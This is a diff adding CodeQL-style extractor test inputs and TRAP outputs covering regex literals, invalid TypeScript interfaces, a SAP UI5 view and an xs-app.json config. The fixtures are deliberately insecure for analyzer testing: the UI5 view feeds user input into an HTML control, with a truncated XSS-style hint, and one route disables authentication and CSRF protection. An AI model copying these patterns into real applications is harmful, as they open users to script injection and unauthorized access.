+regexpterm(#20067,14,#20061,2,"d") +#20068=@"loc,{#10000},2,11,2,11" +locations_default(#20068,#10000,2,11,2,11) +hasLocation(#20067,#20068) +regexp_const_value(#20067,"d") +#20069=* +stmts(#20069,2,#20001,2,"/[\p{Em ... byz]/v;") +hasLocation(#20069,#20007) +stmt_containers(#20069,#20001) +#20070=* +exprs(#20070,5,#20069,0,"/[\p{Em ... }byz]/v") +hasLocation(#20070,#20023) +enclosing_stmt(#20070,#20069) +expr_containers(#20070,#20001) +literals("/[\p{Emoji}\q{a&}byz]/v","/[\p{Emoji}\q{a&}byz]/v",#20070) +#20071=* +regexpterm(#20071,23,#20070,0,"[\p{Emoji}\q{a&}byz]") +#20072=@"loc,{#10000},3,2,3,21" +locations_default(#20072,#10000,3,2,3,21) +hasLocation(#20071,#20072) +#20073=* +regexpterm(#20073,27,#20071,0,"\p{Emoji}") +#20074=@"loc,{#10000},3,3,3,11" +locations_default(#20074,#10000,3,3,3,11) +hasLocation(#20073,#20074) +unicode_property_escapename(#20073,"Emoji") +#20075=* +regexpterm(#20075,28,#20071,1,"\q{a&}") +#20076=@"loc,{#10000},3,12,3,17" +locations_default(#20076,#10000,3,12,3,17) +hasLocation(#20075,#20076) +#20077=* +regexpterm(#20077,14,#20075,0,"a&") +#20078=@"loc,{#10000},3,15,3,16" +locations_default(#20078,#10000,3,15,3,16) +hasLocation(#20077,#20078) +regexp_const_value(#20077,"a&") +#20079=* +regexpterm(#20079,14,#20071,2,"b") +#20080=@"loc,{#10000},3,18,3,18" +locations_default(#20080,#10000,3,18,3,18) +hasLocation(#20079,#20080) +regexp_const_value(#20079,"b") +#20081=* +regexpterm(#20081,14,#20071,3,"y") +#20082=@"loc,{#10000},3,19,3,19" +locations_default(#20082,#10000,3,19,3,19) +hasLocation(#20081,#20082) +regexp_const_value(#20081,"y") +#20083=* +regexpterm(#20083,14,#20071,4,"z") +#20084=@"loc,{#10000},3,20,3,20" +locations_default(#20084,#10000,3,20,3,20) +hasLocation(#20083,#20084) +regexp_const_value(#20083,"z") +#20085=* +stmts(#20085,2,#20001,3,"/[\q{\\\}a&}byz]/v;") +hasLocation(#20085,#20009) +stmt_containers(#20085,#20001) +#20086=* +exprs(#20086,5,#20085,0,"/[\q{\\\}a&}byz]/v") +hasLocation(#20086,#20027) +enclosing_stmt(#20086,#20085) +expr_containers(#20086,#20001) +literals("/[\q{\\\}a&}byz]/v","/[\q{\\\}a&}byz]/v",#20086) +#20087=* +regexpterm(#20087,23,#20086,0,"[\q{\\\}a&}byz]") +#20088=@"loc,{#10000},4,2,4,16" +locations_default(#20088,#10000,4,2,4,16) +hasLocation(#20087,#20088) +#20089=* +regexpterm(#20089,28,#20087,0,"\q{\\\}a&}") +#20090=@"loc,{#10000},4,3,4,12" +locations_default(#20090,#10000,4,3,4,12) +hasLocation(#20089,#20090) +#20091=* +regexpterm(#20091,14,#20089,0,"\\\}a&") +#20092=@"loc,{#10000},4,6,4,11" +locations_default(#20092,#10000,4,6,4,11) +hasLocation(#20091,#20092) +regexp_const_value(#20091,"\\\}a&") +#20093=* +regexpterm(#20093,14,#20087,1,"b") +#20094=@"loc,{#10000},4,13,4,13" +locations_default(#20094,#10000,4,13,4,13) +hasLocation(#20093,#20094) +regexp_const_value(#20093,"b") +#20095=* +regexpterm(#20095,14,#20087,2,"y") +#20096=@"loc,{#10000},4,14,4,14" +locations_default(#20096,#10000,4,14,4,14) +hasLocation(#20095,#20096) +regexp_const_value(#20095,"y") +#20097=* +regexpterm(#20097,14,#20087,3,"z") +#20098=@"loc,{#10000},4,15,4,15" +locations_default(#20098,#10000,4,15,4,15) +hasLocation(#20097,#20098) +regexp_const_value(#20097,"z") +#20099=* +stmts(#20099,2,#20001,4,"/[\q{\\}]/v;") +hasLocation(#20099,#20011) +stmt_containers(#20099,#20001) +#20100=* +exprs(#20100,5,#20099,0,"/[\q{\\}]/v") +hasLocation(#20100,#20031) +enclosing_stmt(#20100,#20099) +expr_containers(#20100,#20001) +literals("/[\q{\\}]/v","/[\q{\\}]/v",#20100) +#20101=* +regexpterm(#20101,23,#20100,0,"[\q{\\}]") +#20102=@"loc,{#10000},5,2,5,9" +locations_default(#20102,#10000,5,2,5,9) +hasLocation(#20101,#20102) +#20103=* +regexpterm(#20103,28,#20101,0,"\q{\\}") +#20104=@"loc,{#10000},5,3,5,8" +locations_default(#20104,#10000,5,3,5,8) +hasLocation(#20103,#20104) +#20105=* +regexpterm(#20105,14,#20103,0,"\\") +#20106=@"loc,{#10000},5,6,5,7" +locations_default(#20106,#10000,5,6,5,7) +hasLocation(#20105,#20106) +regexp_const_value(#20105,"\\") +#20107=* +stmts(#20107,2,#20001,5,"/[\q{abc|cbd|\}}]/v;") +hasLocation(#20107,#20013) +stmt_containers(#20107,#20001) +#20108=* +exprs(#20108,5,#20107,0,"/[\q{abc|cbd|\}}]/v") +hasLocation(#20108,#20035) +enclosing_stmt(#20108,#20107) +expr_containers(#20108,#20001) +literals("/[\q{abc|cbd|\}}]/v","/[\q{abc|cbd|\}}]/v",#20108) +#20109=* +regexpterm(#20109,23,#20108,0,"[\q{abc|cbd|\}}]") +#20110=@"loc,{#10000},6,2,6,17" +locations_default(#20110,#10000,6,2,6,17) +hasLocation(#20109,#20110) +#20111=* +regexpterm(#20111,28,#20109,0,"\q{abc|cbd|\}}") +#20112=@"loc,{#10000},6,3,6,16" +locations_default(#20112,#10000,6,3,6,16) +hasLocation(#20111,#20112) +#20113=* +regexpterm(#20113,0,#20111,0,"abc|cbd|\}") +#20114=@"loc,{#10000},6,6,6,15" +locations_default(#20114,#10000,6,6,6,15) +hasLocation(#20113,#20114) +#20115=* +regexpterm(#20115,14,#20113,0,"abc") +#20116=@"loc,{#10000},6,6,6,8" +locations_default(#20116,#10000,6,6,6,8) +hasLocation(#20115,#20116) +regexp_const_value(#20115,"abc") +#20117=* +regexpterm(#20117,14,#20113,1,"cbd") +#20118=@"loc,{#10000},6,10,6,12" +locations_default(#20118,#10000,6,10,6,12) +hasLocation(#20117,#20118) +regexp_const_value(#20117,"cbd") +#20119=* +regexpterm(#20119,14,#20113,2,"\}") +#20120=@"loc,{#10000},6,14,6,15" +locations_default(#20120,#10000,6,14,6,15) +hasLocation(#20119,#20120) +regexp_const_value(#20119,"\}") +#20121=* +entry_cfg_node(#20121,#20001) +#20122=@"loc,{#10000},1,1,1,0" +locations_default(#20122,#10000,1,1,1,0) +hasLocation(#20121,#20122) +#20123=* +exit_cfg_node(#20123,#20001) +hasLocation(#20123,#20039) +successor(#20107,#20108) +successor(#20108,#20123) +successor(#20099,#20100) +successor(#20100,#20107) +successor(#20085,#20086) +successor(#20086,#20099) +successor(#20069,#20070) +successor(#20070,#20085) +successor(#20049,#20050) +successor(#20050,#20069) +successor(#20041,#20042) +successor(#20042,#20049) +successor(#20121,#20041) +numlines(#10000,6,6,0) +filetype(#10000,"javascript") diff --git a/javascript/extractor/tests/ts/input/invalidExtends.ts b/javascript/extractor/tests/ts/input/invalidExtends.ts new file mode 100644 index 000000000000..d31eba1dae64 --- /dev/null +++ b/javascript/extractor/tests/ts/input/invalidExtends.ts @@ -0,0 +1,6 @@ +interface Invalid extends (foo.bar) {} +interface Invalid extends (foo).bar {} +interface Invalid extends foo[bar] {} +interface Invalid extends foo?.bar {} +interface Invalid extends foo!.bar {} +interface Invalid extends foo() {} diff --git a/javascript/extractor/tests/ts/output/trap/invalidExtends.ts.trap b/javascript/extractor/tests/ts/output/trap/invalidExtends.ts.trap new file mode 100644 index 000000000000..ec1ddb444ef6 --- /dev/null +++ b/javascript/extractor/tests/ts/output/trap/invalidExtends.ts.trap @@ -0,0 +1,451 @@ +#10000=@"/invalidExtends.ts;sourcefile" +files(#10000,"/invalidExtends.ts") +#10001=@"/;folder" +folders(#10001,"/") +containerparent(#10001,#10000) +#10002=@"loc,{#10000},0,0,0,0" +locations_default(#10002,#10000,0,0,0,0) +hasLocation(#10000,#10002) +#20000=@"global_scope" +scopes(#20000,0) +#20001=@"script;{#10000},1,1" +#20002=* +lines(#20002,#20001,"interface Invalid extends (foo.bar) {}"," +") +#20003=@"loc,{#10000},1,1,1,38" +locations_default(#20003,#10000,1,1,1,38) +hasLocation(#20002,#20003) +#20004=* +lines(#20004,#20001,"interface Invalid extends (foo).bar {}"," +") +#20005=@"loc,{#10000},2,1,2,38" +locations_default(#20005,#10000,2,1,2,38) +hasLocation(#20004,#20005) +#20006=* +lines(#20006,#20001,"interface Invalid extends foo[bar] {}"," +") +#20007=@"loc,{#10000},3,1,3,37" +locations_default(#20007,#10000,3,1,3,37) +hasLocation(#20006,#20007) +#20008=* +lines(#20008,#20001,"interface Invalid extends foo?.bar {}"," +") +#20009=@"loc,{#10000},4,1,4,37" +locations_default(#20009,#10000,4,1,4,37) +hasLocation(#20008,#20009) +#20010=* +lines(#20010,#20001,"interface Invalid extends foo!.bar {}"," +") +#20011=@"loc,{#10000},5,1,5,37" +locations_default(#20011,#10000,5,1,5,37) +hasLocation(#20010,#20011) +#20012=* +lines(#20012,#20001,"interface Invalid extends foo() {}"," +") +#20013=@"loc,{#10000},6,1,6,34" +locations_default(#20013,#10000,6,1,6,34) +hasLocation(#20012,#20013) +numlines(#20001,6,6,0) +#20014=* +tokeninfo(#20014,7,#20001,0,"interface") +#20015=@"loc,{#10000},1,1,1,9" +locations_default(#20015,#10000,1,1,1,9) +hasLocation(#20014,#20015) +#20016=* +tokeninfo(#20016,6,#20001,1,"Invalid") +#20017=@"loc,{#10000},1,11,1,17" +locations_default(#20017,#10000,1,11,1,17) +hasLocation(#20016,#20017) +#20018=* +tokeninfo(#20018,7,#20001,2,"extends") +#20019=@"loc,{#10000},1,19,1,25" +locations_default(#20019,#10000,1,19,1,25) +hasLocation(#20018,#20019) +#20020=* +tokeninfo(#20020,8,#20001,3,"(") +#20021=@"loc,{#10000},1,27,1,27" +locations_default(#20021,#10000,1,27,1,27) +hasLocation(#20020,#20021) +#20022=* +tokeninfo(#20022,6,#20001,4,"foo") +#20023=@"loc,{#10000},1,28,1,30" +locations_default(#20023,#10000,1,28,1,30) +hasLocation(#20022,#20023) +#20024=* +tokeninfo(#20024,8,#20001,5,".") +#20025=@"loc,{#10000},1,31,1,31" +locations_default(#20025,#10000,1,31,1,31) +hasLocation(#20024,#20025) +#20026=* +tokeninfo(#20026,6,#20001,6,"bar") +#20027=@"loc,{#10000},1,32,1,34" +locations_default(#20027,#10000,1,32,1,34) +hasLocation(#20026,#20027) +#20028=* +tokeninfo(#20028,8,#20001,7,")") +#20029=@"loc,{#10000},1,35,1,35" +locations_default(#20029,#10000,1,35,1,35) +hasLocation(#20028,#20029) +#20030=* +tokeninfo(#20030,8,#20001,8,"{") +#20031=@"loc,{#10000},1,37,1,37" +locations_default(#20031,#10000,1,37,1,37) +hasLocation(#20030,#20031) +#20032=* +tokeninfo(#20032,8,#20001,9,"}") +#20033=@"loc,{#10000},1,38,1,38" +locations_default(#20033,#10000,1,38,1,38) +hasLocation(#20032,#20033) +#20034=* +tokeninfo(#20034,7,#20001,10,"interface") +#20035=@"loc,{#10000},2,1,2,9" +locations_default(#20035,#10000,2,1,2,9) +hasLocation(#20034,#20035) +#20036=* +tokeninfo(#20036,6,#20001,11,"Invalid") +#20037=@"loc,{#10000},2,11,2,17" +locations_default(#20037,#10000,2,11,2,17) +hasLocation(#20036,#20037) +#20038=* +tokeninfo(#20038,7,#20001,12,"extends") +#20039=@"loc,{#10000},2,19,2,25" +locations_default(#20039,#10000,2,19,2,25) +hasLocation(#20038,#20039) +#20040=* +tokeninfo(#20040,8,#20001,13,"(") +#20041=@"loc,{#10000},2,27,2,27" +locations_default(#20041,#10000,2,27,2,27) +hasLocation(#20040,#20041) +#20042=* +tokeninfo(#20042,6,#20001,14,"foo") +#20043=@"loc,{#10000},2,28,2,30" +locations_default(#20043,#10000,2,28,2,30) +hasLocation(#20042,#20043) +#20044=* +tokeninfo(#20044,8,#20001,15,")") +#20045=@"loc,{#10000},2,31,2,31" +locations_default(#20045,#10000,2,31,2,31) +hasLocation(#20044,#20045) +#20046=* +tokeninfo(#20046,8,#20001,16,".") +#20047=@"loc,{#10000},2,32,2,32" +locations_default(#20047,#10000,2,32,2,32) +hasLocation(#20046,#20047) +#20048=* +tokeninfo(#20048,6,#20001,17,"bar") +#20049=@"loc,{#10000},2,33,2,35" +locations_default(#20049,#10000,2,33,2,35) +hasLocation(#20048,#20049) +#20050=* +tokeninfo(#20050,8,#20001,18,"{") +#20051=@"loc,{#10000},2,37,2,37" +locations_default(#20051,#10000,2,37,2,37) +hasLocation(#20050,#20051) +#20052=* +tokeninfo(#20052,8,#20001,19,"}") +#20053=@"loc,{#10000},2,38,2,38" +locations_default(#20053,#10000,2,38,2,38) +hasLocation(#20052,#20053) +#20054=* +tokeninfo(#20054,7,#20001,20,"interface") +#20055=@"loc,{#10000},3,1,3,9" +locations_default(#20055,#10000,3,1,3,9) +hasLocation(#20054,#20055) +#20056=* +tokeninfo(#20056,6,#20001,21,"Invalid") +#20057=@"loc,{#10000},3,11,3,17" +locations_default(#20057,#10000,3,11,3,17) +hasLocation(#20056,#20057) +#20058=* +tokeninfo(#20058,7,#20001,22,"extends") +#20059=@"loc,{#10000},3,19,3,25" +locations_default(#20059,#10000,3,19,3,25) +hasLocation(#20058,#20059) +#20060=* +tokeninfo(#20060,6,#20001,23,"foo") +#20061=@"loc,{#10000},3,27,3,29" +locations_default(#20061,#10000,3,27,3,29) +hasLocation(#20060,#20061) +#20062=* +tokeninfo(#20062,8,#20001,24,"[") +#20063=@"loc,{#10000},3,30,3,30" +locations_default(#20063,#10000,3,30,3,30) +hasLocation(#20062,#20063) +#20064=* +tokeninfo(#20064,6,#20001,25,"bar") +#20065=@"loc,{#10000},3,31,3,33" +locations_default(#20065,#10000,3,31,3,33) +hasLocation(#20064,#20065) +#20066=* +tokeninfo(#20066,8,#20001,26,"]") +#20067=@"loc,{#10000},3,34,3,34" +locations_default(#20067,#10000,3,34,3,34) +hasLocation(#20066,#20067) +#20068=* +tokeninfo(#20068,8,#20001,27,"{") +#20069=@"loc,{#10000},3,36,3,36" +locations_default(#20069,#10000,3,36,3,36) +hasLocation(#20068,#20069) +#20070=* +tokeninfo(#20070,8,#20001,28,"}") +#20071=@"loc,{#10000},3,37,3,37" +locations_default(#20071,#10000,3,37,3,37) +hasLocation(#20070,#20071) +#20072=* +tokeninfo(#20072,7,#20001,29,"interface") +#20073=@"loc,{#10000},4,1,4,9" +locations_default(#20073,#10000,4,1,4,9) +hasLocation(#20072,#20073) +#20074=* +tokeninfo(#20074,6,#20001,30,"Invalid") +#20075=@"loc,{#10000},4,11,4,17" +locations_default(#20075,#10000,4,11,4,17) +hasLocation(#20074,#20075) +#20076=* +tokeninfo(#20076,7,#20001,31,"extends") +#20077=@"loc,{#10000},4,19,4,25" +locations_default(#20077,#10000,4,19,4,25) +hasLocation(#20076,#20077) +#20078=* +tokeninfo(#20078,6,#20001,32,"foo") +#20079=@"loc,{#10000},4,27,4,29" +locations_default(#20079,#10000,4,27,4,29) +hasLocation(#20078,#20079) +#20080=* +tokeninfo(#20080,8,#20001,33,"?.") +#20081=@"loc,{#10000},4,30,4,31" +locations_default(#20081,#10000,4,30,4,31) +hasLocation(#20080,#20081) +#20082=* +tokeninfo(#20082,6,#20001,34,"bar") +#20083=@"loc,{#10000},4,32,4,34" +locations_default(#20083,#10000,4,32,4,34) +hasLocation(#20082,#20083) +#20084=* +tokeninfo(#20084,8,#20001,35,"{") +#20085=@"loc,{#10000},4,36,4,36" +locations_default(#20085,#10000,4,36,4,36) +hasLocation(#20084,#20085) +#20086=* +tokeninfo(#20086,8,#20001,36,"}") +#20087=@"loc,{#10000},4,37,4,37" +locations_default(#20087,#10000,4,37,4,37) +hasLocation(#20086,#20087) +#20088=* +tokeninfo(#20088,7,#20001,37,"interface") +#20089=@"loc,{#10000},5,1,5,9" +locations_default(#20089,#10000,5,1,5,9) +hasLocation(#20088,#20089) +#20090=* +tokeninfo(#20090,6,#20001,38,"Invalid") +#20091=@"loc,{#10000},5,11,5,17" +locations_default(#20091,#10000,5,11,5,17) +hasLocation(#20090,#20091) +#20092=* +tokeninfo(#20092,7,#20001,39,"extends") +#20093=@"loc,{#10000},5,19,5,25" +locations_default(#20093,#10000,5,19,5,25) +hasLocation(#20092,#20093) +#20094=* +tokeninfo(#20094,6,#20001,40,"foo") +#20095=@"loc,{#10000},5,27,5,29" +locations_default(#20095,#10000,5,27,5,29) +hasLocation(#20094,#20095) +#20096=* +tokeninfo(#20096,8,#20001,41,"!") +#20097=@"loc,{#10000},5,30,5,30" +locations_default(#20097,#10000,5,30,5,30) +hasLocation(#20096,#20097) +#20098=* +tokeninfo(#20098,8,#20001,42,".") +#20099=@"loc,{#10000},5,31,5,31" +locations_default(#20099,#10000,5,31,5,31) +hasLocation(#20098,#20099) +#20100=* +tokeninfo(#20100,6,#20001,43,"bar") +#20101=@"loc,{#10000},5,32,5,34" +locations_default(#20101,#10000,5,32,5,34) +hasLocation(#20100,#20101) +#20102=* +tokeninfo(#20102,8,#20001,44,"{") +#20103=@"loc,{#10000},5,36,5,36" +locations_default(#20103,#10000,5,36,5,36) +hasLocation(#20102,#20103) +#20104=* +tokeninfo(#20104,8,#20001,45,"}") +#20105=@"loc,{#10000},5,37,5,37" +locations_default(#20105,#10000,5,37,5,37) +hasLocation(#20104,#20105) +#20106=* +tokeninfo(#20106,7,#20001,46,"interface") +#20107=@"loc,{#10000},6,1,6,9" +locations_default(#20107,#10000,6,1,6,9) +hasLocation(#20106,#20107) +#20108=* +tokeninfo(#20108,6,#20001,47,"Invalid") +#20109=@"loc,{#10000},6,11,6,17" +locations_default(#20109,#10000,6,11,6,17) +hasLocation(#20108,#20109) +#20110=* +tokeninfo(#20110,7,#20001,48,"extends") +#20111=@"loc,{#10000},6,19,6,25" +locations_default(#20111,#10000,6,19,6,25) +hasLocation(#20110,#20111) +#20112=* +tokeninfo(#20112,6,#20001,49,"foo") +#20113=@"loc,{#10000},6,27,6,29" +locations_default(#20113,#10000,6,27,6,29) +hasLocation(#20112,#20113) +#20114=* +tokeninfo(#20114,8,#20001,50,"(") +#20115=@"loc,{#10000},6,30,6,30" +locations_default(#20115,#10000,6,30,6,30) +hasLocation(#20114,#20115) +#20116=* +tokeninfo(#20116,8,#20001,51,")") +#20117=@"loc,{#10000},6,31,6,31" +locations_default(#20117,#10000,6,31,6,31) +hasLocation(#20116,#20117) +#20118=* +tokeninfo(#20118,8,#20001,52,"{") +#20119=@"loc,{#10000},6,33,6,33" +locations_default(#20119,#10000,6,33,6,33) +hasLocation(#20118,#20119) +#20120=* +tokeninfo(#20120,8,#20001,53,"}") +#20121=@"loc,{#10000},6,34,6,34" +locations_default(#20121,#10000,6,34,6,34) +hasLocation(#20120,#20121) +#20122=* +tokeninfo(#20122,0,#20001,54,"") +#20123=@"loc,{#10000},7,1,7,0" +locations_default(#20123,#10000,7,1,7,0) +hasLocation(#20122,#20123) +toplevels(#20001,0) +#20124=@"loc,{#10000},1,1,7,0" +locations_default(#20124,#10000,1,1,7,0) +hasLocation(#20001,#20124) +#20125=@"local_type_name;{Invalid};{#20000}" +local_type_names(#20125,"Invalid",#20000) +#20126=* +stmts(#20126,34,#20001,0,"interfa ... bar) {}") +hasLocation(#20126,#20003) +stmt_containers(#20126,#20001) +#20127=* +typeexprs(#20127,1,#20126,0,"Invalid") +hasLocation(#20127,#20017) +enclosing_stmt(#20127,#20126) +expr_containers(#20127,#20001) +literals("Invalid","Invalid",#20127) +typedecl(#20127,#20125) +#20128=* +stmts(#20128,34,#20001,1,"interfa ... .bar {}") +hasLocation(#20128,#20005) +stmt_containers(#20128,#20001) +#20129=* +typeexprs(#20129,1,#20128,0,"Invalid") +hasLocation(#20129,#20037) +enclosing_stmt(#20129,#20128) +expr_containers(#20129,#20001) +literals("Invalid","Invalid",#20129) +typedecl(#20129,#20125) +#20130=* +stmts(#20130,34,#20001,2,"interfa ... bar] {}") +hasLocation(#20130,#20007) +stmt_containers(#20130,#20001) +#20131=* +typeexprs(#20131,13,#20130,-1,"foo[bar]") +#20132=@"loc,{#10000},3,27,3,34" +locations_default(#20132,#10000,3,27,3,34) +hasLocation(#20131,#20132) +enclosing_stmt(#20131,#20130) +expr_containers(#20131,#20001) +#20133=* +typeexprs(#20133,25,#20131,0,"foo") +hasLocation(#20133,#20061) +enclosing_stmt(#20133,#20130) +expr_containers(#20133,#20001) +literals("foo","foo",#20133) +#20134=* +typeexprs(#20134,15,#20131,1,"bar") +hasLocation(#20134,#20065) +enclosing_stmt(#20134,#20130) +expr_containers(#20134,#20001) +literals("bar","bar",#20134) +#20135=* +typeexprs(#20135,1,#20130,0,"Invalid") +hasLocation(#20135,#20057) +enclosing_stmt(#20135,#20130) +expr_containers(#20135,#20001) +literals("Invalid","Invalid",#20135) +typedecl(#20135,#20125) +#20136=* +stmts(#20136,34,#20001,3,"interfa ... .bar {}") +hasLocation(#20136,#20009) +stmt_containers(#20136,#20001) +#20137=* +typeexprs(#20137,13,#20136,-1,"foo?.bar") +#20138=@"loc,{#10000},4,27,4,34" +locations_default(#20138,#10000,4,27,4,34) +hasLocation(#20137,#20138) +enclosing_stmt(#20137,#20136) +expr_containers(#20137,#20001) +#20139=* +typeexprs(#20139,25,#20137,0,"foo") +hasLocation(#20139,#20079) +enclosing_stmt(#20139,#20136) +expr_containers(#20139,#20001) +literals("foo","foo",#20139) +#20140=* +typeexprs(#20140,15,#20137,1,"bar") +hasLocation(#20140,#20083) +enclosing_stmt(#20140,#20136) +expr_containers(#20140,#20001) +literals("bar","bar",#20140) +isOptionalChaining(#20137) +#20141=* +typeexprs(#20141,1,#20136,0,"Invalid") +hasLocation(#20141,#20075) +enclosing_stmt(#20141,#20136) +expr_containers(#20141,#20001) +literals("Invalid","Invalid",#20141) +typedecl(#20141,#20125) +#20142=* +stmts(#20142,34,#20001,4,"interfa ... .bar {}") +hasLocation(#20142,#20011) +stmt_containers(#20142,#20001) +#20143=* +typeexprs(#20143,1,#20142,0,"Invalid") +hasLocation(#20143,#20091) +enclosing_stmt(#20143,#20142) +expr_containers(#20143,#20001) +literals("Invalid","Invalid",#20143) +typedecl(#20143,#20125) +#20144=* +stmts(#20144,34,#20001,5,"interfa ... oo() {}") +hasLocation(#20144,#20013) +stmt_containers(#20144,#20001) +#20145=* +typeexprs(#20145,1,#20144,0,"Invalid") +hasLocation(#20145,#20109) +enclosing_stmt(#20145,#20144) +expr_containers(#20145,#20001) +literals("Invalid","Invalid",#20145) +typedecl(#20145,#20125) +#20146=* +entry_cfg_node(#20146,#20001) +#20147=@"loc,{#10000},1,1,1,0" +locations_default(#20147,#10000,1,1,1,0) +hasLocation(#20146,#20147) +#20148=* +exit_cfg_node(#20148,#20001) +hasLocation(#20148,#20123) +successor(#20144,#20148) +successor(#20142,#20144) +successor(#20136,#20142) +successor(#20130,#20136) +successor(#20128,#20130) +successor(#20126,#20128) +successor(#20146,#20126) +numlines(#10000,6,6,0) +filetype(#10000,"typescript") diff --git a/javascript/extractor/tests/ui5/input/test.view.json b/javascript/extractor/tests/ui5/input/test.view.json new file mode 100644 index 000000000000..32f686ec3b25 --- /dev/null +++ b/javascript/extractor/tests/ui5/input/test.view.json @@ -0,0 +1,16 @@ +{ + "Type": "sap.ui.core.mvc.JSONView", + "controllerName": "codeql-sap-js.controller.app", + "content": [ + { + "Type": "sap.m.Input", + "placeholder": "Enter Payload", + "description": "Try: ", + "value": "{/input}" + }, + { + "Type": "sap.ui.core.HTML", + "content": "{/input}" + } + ] +} \ No newline at end of file diff --git a/javascript/extractor/tests/ui5/output/trap/test.view.json.trap b/javascript/extractor/tests/ui5/output/trap/test.view.json.trap new file mode 100644 index 000000000000..064acca52321 --- /dev/null +++ b/javascript/extractor/tests/ui5/output/trap/test.view.json.trap @@ -0,0 +1,87 @@ +#10000=@"/test.view.json;sourcefile" +files(#10000,"/test.view.json") +#10001=@"/;folder" +folders(#10001,"/") +containerparent(#10001,#10000) +#10002=@"loc,{#10000},0,0,0,0" +locations_default(#10002,#10000,0,0,0,0) +hasLocation(#10000,#10002) +#20000=* +json(#20000,5,#10000,0,"{\n "" ... ]\n}") +#20001=@"loc,{#10000},1,1,16,1" +locations_default(#20001,#10000,1,1,16,1) +json_locations(#20000,#20001) +#20002=* +json(#20002,3,#20000,0,"""sap.ui ... ONView""") +#20003=@"loc,{#10000},2,13,2,38" +locations_default(#20003,#10000,2,13,2,38) +json_locations(#20002,#20003) +json_literals("sap.ui.core.mvc.JSONView","""sap.ui.core.mvc.JSONView""",#20002) +json_properties(#20000,"Type",#20002) +#20004=* +json(#20004,3,#20000,1,"""codeql ... er.app""") +#20005=@"loc,{#10000},3,23,3,52" +locations_default(#20005,#10000,3,23,3,52) +json_locations(#20004,#20005) +json_literals("codeql-sap-js.controller.app","""codeql-sap-js.controller.app""",#20004) +json_properties(#20000,"controllerName",#20004) +#20006=* +json(#20006,4,#20000,2,"[\n ... }\n ]") +#20007=@"loc,{#10000},4,16,15,5" +locations_default(#20007,#10000,4,16,15,5) +json_locations(#20006,#20007) +#20008=* +json(#20008,5,#20006,0,"{\n ... }") +#20009=@"loc,{#10000},5,9,10,9" +locations_default(#20009,#10000,5,9,10,9) +json_locations(#20008,#20009) +#20010=* +json(#20010,3,#20008,0,"""sap.m.Input""") +#20011=@"loc,{#10000},6,21,6,33" +locations_default(#20011,#10000,6,21,6,33) +json_locations(#20010,#20011) +json_literals("sap.m.Input","""sap.m.Input""",#20010) +json_properties(#20008,"Type",#20010) +#20012=* +json(#20012,3,#20008,1,"""Enter Payload""") +#20013=@"loc,{#10000},7,28,7,42" +locations_default(#20013,#10000,7,28,7,42) +json_locations(#20012,#20013) +json_literals("Enter Payload","""Enter Payload""",#20012) +json_properties(#20008,"placeholder",#20012) +#20014=* +json(#20014,3,#20008,2,"""Try: < ... SS\"")>""") +#20015=@"loc,{#10000},8,28,8,68" +locations_default(#20015,#10000,8,28,8,68) +json_locations(#20014,#20015) +json_literals("Try: ","""Try: """,#20014) +json_properties(#20008,"description",#20014) +#20016=* +json(#20016,3,#20008,3,"""{/input}""") +#20017=@"loc,{#10000},9,22,9,31" +locations_default(#20017,#10000,9,22,9,31) +json_locations(#20016,#20017) +json_literals("{/input}","""{/input}""",#20016) +json_properties(#20008,"value",#20016) +#20018=* +json(#20018,5,#20006,1,"{\n ... }") +#20019=@"loc,{#10000},11,9,14,9" +locations_default(#20019,#10000,11,9,14,9) +json_locations(#20018,#20019) +#20020=* +json(#20020,3,#20018,0,"""sap.ui.core.HTML""") +#20021=@"loc,{#10000},12,21,12,38" +locations_default(#20021,#10000,12,21,12,38) +json_locations(#20020,#20021) +json_literals("sap.ui.core.HTML","""sap.ui.core.HTML""",#20020) +json_properties(#20018,"Type",#20020) +#20022=* +json(#20022,3,#20018,1,"""{/input}""") +#20023=@"loc,{#10000},13,24,13,33" +locations_default(#20023,#10000,13,24,13,33) +json_locations(#20022,#20023) +json_literals("{/input}","""{/input}""",#20022) +json_properties(#20018,"content",#20022) +json_properties(#20000,"content",#20006) +numlines(#10000,16,0,0) +filetype(#10000,"json") diff --git a/javascript/extractor/tests/xsaccess/input/.xsaccess b/javascript/extractor/tests/xsjs/input/.xsaccess similarity index 100% rename from javascript/extractor/tests/xsaccess/input/.xsaccess rename to javascript/extractor/tests/xsjs/input/.xsaccess diff --git a/javascript/extractor/tests/xsjs/input/xs-app.json b/javascript/extractor/tests/xsjs/input/xs-app.json new file mode 100644 index 000000000000..01890c1ddf1e --- /dev/null +++ b/javascript/extractor/tests/xsjs/input/xs-app.json @@ -0,0 +1,12 @@ +{ + "welcomeFile": "index.html", + "authenticationMethod": "none", + "routes": [ + { + "source": "/bad/(.*)", + "destination": "srv_api", + "csrfProtection": false, + "authenticationType": "none" + } + ] +} \ No newline at end of file diff --git a/javascript/extractor/tests/xsaccess/output/trap/.xsaccess.trap b/javascript/extractor/tests/xsjs/output/trap/.xsaccess.trap similarity index 100% rename from javascript/extractor/tests/xsaccess/output/trap/.xsaccess.trap rename to javascript/extractor/tests/xsjs/output/trap/.xsaccess.trap diff --git a/javascript/extractor/tests/xsjs/output/trap/xs-app.json.trap b/javascript/extractor/tests/xsjs/output/trap/xs-app.json.trap new file mode 100644 index 000000000000..d9a35a42450d --- /dev/null +++ b/javascript/extractor/tests/xsjs/output/trap/xs-app.json.trap @@ -0,0 +1,68 @@ +#10000=@"/xs-app.json;sourcefile" +files(#10000,"/xs-app.json") +#10001=@"/;folder" +folders(#10001,"/") +containerparent(#10001,#10000) +#10002=@"loc,{#10000},0,0,0,0" +locations_default(#10002,#10000,0,0,0,0) +hasLocation(#10000,#10002) +#20000=* +json(#20000,5,#10000,0,"{\n "" ... ]\n}") +#20001=@"loc,{#10000},1,1,12,1" +locations_default(#20001,#10000,1,1,12,1) +json_locations(#20000,#20001) +#20002=* +json(#20002,3,#20000,0,"""index.html""") +#20003=@"loc,{#10000},2,20,2,31" +locations_default(#20003,#10000,2,20,2,31) +json_locations(#20002,#20003) +json_literals("index.html","""index.html""",#20002) +json_properties(#20000,"welcomeFile",#20002) +#20004=* +json(#20004,3,#20000,1,"""none""") +#20005=@"loc,{#10000},3,29,3,34" +locations_default(#20005,#10000,3,29,3,34) +json_locations(#20004,#20005) +json_literals("none","""none""",#20004) +json_properties(#20000,"authenticationMethod",#20004) +#20006=* +json(#20006,4,#20000,2,"[\n ... }\n ]") +#20007=@"loc,{#10000},4,15,11,5" +locations_default(#20007,#10000,4,15,11,5) +json_locations(#20006,#20007) +#20008=* +json(#20008,5,#20006,0,"{\n ... }") +#20009=@"loc,{#10000},5,9,10,9" 